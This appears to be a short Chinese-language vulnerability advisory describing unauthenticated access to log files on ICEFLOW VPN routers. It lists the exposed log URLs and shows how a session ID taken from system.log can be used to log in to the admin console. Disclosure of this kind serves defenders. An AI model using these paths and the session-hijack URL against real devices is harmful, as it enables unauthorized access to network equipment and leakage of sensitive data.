冰峰VPN /log/system.log 敏感信息泄漏漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

由于“ICEFLOW VPN Router”设备产品存在各种日志文件未授权访问可导致系统敏感信息泄漏。(包括登录成功后的session值) ``` 系统日志http://url/log/system.log VPN日志http://url/log/vpn.log 移动用户日志http://url/log/mobile.log 防火墙日志http://url/log/firewall.log 访问日志http://url/log/access.log 告警日志http://url/log/warn.log 错误日志http://url/log/error.log 调试日志http://url/log1/debug.log ``` 根据日志信息获得session后,可利用实时登录系统管理后台: ``` http://地址/cgi-bin/index?oid=10&session_id=通过“system.log”文件获取&l=0 ``` ![](https://images.seebug.org/contribute/7ab7105f-9411-4699-b9f9-5410b0f23243-屏幕快照 2016-01-14 上午12.50.02.png) ![](https://images.seebug.org/contribute/7291f36b-638b-412b-a7c8-554e2254122d-屏幕快照 2016-01-14 上午12.50.41.png)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息